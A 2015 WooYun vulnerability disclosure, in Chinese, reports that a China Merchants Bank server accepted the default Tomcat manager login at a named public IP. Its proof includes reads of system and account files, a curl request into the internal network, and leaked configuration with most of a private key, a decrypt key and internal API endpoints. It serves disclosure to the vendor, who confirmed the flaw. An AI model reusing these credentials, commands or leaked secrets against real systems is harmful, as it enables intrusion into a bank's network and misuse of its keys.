当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0109531

漏洞标题:招商银行某服务器存在漏洞可SHELL(穿透边界防火墙连通内网)

相关厂商:招商银行

漏洞作者: 猪猪侠

提交时间:2015-04-21 21:44

修复时间:2015-06-05 23:18

公开时间:2015-06-05 23:18

漏洞类型:后台弱口令

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-21: 细节已通知厂商并且等待厂商处理中
2015-04-21: 厂商已经确认,细节仅向厂商公开
2015-05-01: 细节向核心白帽子及相关领域专家公开
2015-05-11: 细节向普通白帽子公开
2015-05-21: 细节向实习白帽子公开
2015-06-05: 细节向公众公开

简要描述:

招商银行某服务器存在漏洞可SHELL(穿透边界防火墙连通内网),毕竟银行系统不敢深入

详细说明:

http://61.152.151.203:8001/manager/html
tomcat:tomcat
跟招商银行微信+银行卡相关的系统

cmb/card_getCardDetail.action
cmb/card_getCardForWeixin.action


tomcat.png


cat /etc/resolv.conf
search	cmbccd.cmbchina.com
nameserver	10.48.64.6
nameserver	10.48.64.7
nameserver	10.47.1.11
cat /etc/hosts
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
127.0.1.1	SCCWECHAT02101.cmbccd.cmbchina.com SCCWECHAT02101


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/dev/null
daemon:x:2:2:daemon:/sbin:/dev/null
adm:x:3:4:adm:/var/adm:/dev/null
lp:x:4:7:lp:/var/spool/lpd:/dev/null
sync:x:5:0:sync:/sbin:/dev/null
shutdown:x:6:0:shutdown:/sbin:/dev/null
halt:x:7:0:halt:/sbin:/dev/null
mail:x:8:12:mail:/var/spool/mail:/dev/null
uucp:x:10:14:uucp:/var/spool/uucp:/dev/null
operator:x:11:0:operator:/root:/dev/null
games:x:12:100:games:/usr/games:/dev/null
gopher:x:13:30:gopher:/var/gopher:/dev/null
ftp:x:14:50:FTP User:/var/ftp:/dev/null
nobody:x:99:99:Nobody:/:/dev/null
dbus:x:81:81:System message bus:/:/dev/null
vcsa:x:69:69:virtual console memory owner:/dev:/dev/null
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/dev/null
abrt:x:173:173::/etc/abrt:/dev/null
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/dev/null
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/dev/null
haldaemon:x:68:68:HAL daemon:/:/dev/null
ntp:x:38:38::/etc/ntp:/dev/null
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/dev/null
postfix:x:89:89::/var/spool/postfix:/dev/null
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/dev/null
tcpdump:x:72:72::/:/dev/null
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/dev/null
admin:x:0:0::/home/admin:/bin/bash
useradmin:x:500:10::/home/useradmin:/bin/bash
imcc:x:501:501::/home/imcc:/bin/bash

漏洞证明:

这台服务器与10网段的内网相连
curl http://10.48.88.56:8088

<html><head><title>Apache Tomcat/6.0.35 - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}A.name {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - There is no Action mapped for namespace [/] and action name [] associated with context path [].</h1><HR size="1" noshade="noshade"><p><b>type</b> Status report</p><p><b>message</b> <u>There is no Action mapped for namespace [/] and action name [] associated with context path [].</u></p><p><b>description</b> <u>The requested resource (There is no Action mapped for namespace [/] and action name [] associated with context path [].) is not available.</u></p><HR size="1" noshade="noshade"><h3>Apache Tomcat/6.0.35</h3></body></html>


#==================================#
#OAuth
#================================#
Encrypt_Key=cmb**.**
#==================================#
#cmb积分红包
#==================================#
#==测试环境==
#活动结束时间
activityEndTime=2015-02-27 00:00:00
#调用接口ip
ip=http://10.48.**.**:8088
#获取jsapi_ticket
jsapi_ticket=http://10.48.**.**:8088/repoints/repoints_getWXjsAPIticket.action
#判断用户是否绑定
isBind=/repoints/repoints_isBind.action
#获取总积分
queryTotalPoints=/repoints/repoints_queryAvaiPoints.action
#获取手机验证码
getCaptcha=/repoints/repoints_getValidateCode.action
#创建红包
crtRedEnvelope=/repoints/repoints_crtRedEnvelope.action
#根据红包id获取被抢的红包及其明细
getREDetails=/repoints/repoints_getREDetailsByREId.action
#根据红包id获取被抢的红包及其明细
drawRedEnvelope=/repoints/repoints_drawRedEnvelope.action
#根据openid获取所有红包及其被抢的明细
getAllREPoints=/repoints/repoints_getAllREPointsByOpenid.action
#根据openid获取抢到的红包及其明细
getDrawRedEnvelope=/repoints/repoints_getRedEnvelopeByOpenId.action
#领红包
accountPoints=/repoints/repoints_accountPoints.action
#==================================#
#微信js-sdk
#==================================#
#生成签名的随机字符串
noncestr=CMB20**.**lope
#==================================#
#私钥
#==================================#
#私钥
prikey=MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBANHgRp2RmBIGbCjhNU33HITz34w97g7iDSajwx35HqPZH+wmupNdaRaOXbVmjoV72o5xhqQ/TEPXztHxv5/rpra9VsXXlzv9lHrkjqWtjwgAcf0JuMGAAV9waGzfw7tUlIV/QRoDZgLje+9Jv3JWbHEBUsP5motEqI9fwwn5TSAlAgMBAAECgYBEM56e+74wNVgWnMDGukPRTLLbjxB6U6k0Ykk4x0jWs+s0wY0l8FgDFXaMSWyNIidu3KOFYnB1J381KFs+K8T7zHdolI4kUs1gclDEdv2QSqAP8t54AbY+eeASxNomy98mDGxftQuWjcfPiYVAGmYp248aNRdZdI6cHJFVEb7S4QJBAPXwszGTg/cSUxhmYYM52IA8Q1vMJpim960q+bCHZTpg6wfeielftQbfWn00F0lbZiEy5vGGMT7X+JaSCW5+NskCQQDadfB2c+5xWZhrxkpAKV4XA7ODgtB9IyIHzFdxMWblCSLR2JQNJaud9OE7s0GSZPp1d6Cvu/6ewzPCVZvbmWB9AkEA8+Ufz6pa1Ep33VqqmVhkO8eHhSGPpRLvy+s**************************************************************************uwRWV8zzjzAc4ylKvr2uY5FmUHn96Lw=
share_page_url=http://pointsbonus.cmbchina.com/bindpoints/bindPointsIndex
redirect_Url=http://www.baidu.com
decrypt_Key=cmbedcba
#yaoyuan.150331
backstage_url=http://10.48.**.**:8088/bindPoints/points_shareRecord.action
<?xml version="1.0" encoding="UTF-8"?>
<root>
	<AttentionAwoke>
		<!-- 重发次数 -->
		<sendNum>3</sendNum>
		<comefrom>161</comefrom>
		<!-- new相关配置信息 -->
		<title>官方微信智能语音邀您体验--随时申请调高信用额度--快速定位周边优惠商户、特价影院、招行网点、ATM--让“小招”常驻手机桌面,快速掌握您的用卡信息</title>
        <description>3秒查账单、查积分、查额度--随时申请调高信用额度--周边优惠商户、招行网点--让“小招”出现在手机桌面</description>
		<picUrl>http://market.cmbchina.com/ccard/weixin/news/20140122/640b.jpg--http://market.cmbchina.com/ccard/weixin/news/20140122/a.gif--http://market.cmbchina.com/ccard/weixin/news/20140122/b.gif--http://market.cmbchina.com/ccard/weixin/news/20140122/c.jpg</picUrl>
		<url>http://market.cmbchina.com/ccard/weixin/news/20140122/--http://market.cmbchina.com/ccard/weixin/news/20130916/--http://market.cmbchina.com/ccard/weixin/news/20140120_lbs/--http://market.cmbchina.com/ccard/weixin/news/20140120_kjzm/</url>
		<!-- UAT -->
	</AttentionAwoke>
	<weixingUrl>
		<!-- 是否启动从鉴权机获取token -->
		<getToken>true</getToken>
		<!-- 生产环境 -->
		<!-- <newtoken>http://10.48.**.**:8081/system/weixin!gettoken.action</newtoken>
		<getToken>http://10.48.**.**:8090/cgi-bin/token</getToken>
		<api>http://10.48..**.**:8090/cgi-bin/</api>  -->
		<!-- 测试环境 -->
		 <getToken>http://api.weixin.qq.com/cgi-bin/token</getToken>
		<api>http://api.weixin.qq.com/cgi-bin/</api>
		<newtoken>http://192.168..**.**:8781/system/weixin!gettoken.action
		</newtoken> 
	</weixingUrl>
	<CARD>
		<page_size>10</page_size>
		<page_url>system/card_getBatchCard</page_url>
		<get_card_url>http://192.168.**.**:8027/cmb/card_getCardForWeixin.action</get_card_url>
		<card_detail_url>http://192.168.**.**:8027/cmb/card_getCardDetail.action</card_detail_url>
		<card_info_url>/jsp/card/cardInfo.jsp?wechat_card_js=1</card_info_url>
	</CARD>
</root>

修复方案:

这个就不要开放在外网了吧

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-04-21 23:16

厂商回复:

感谢对招商银行安全的关注。

最新状态:

暂无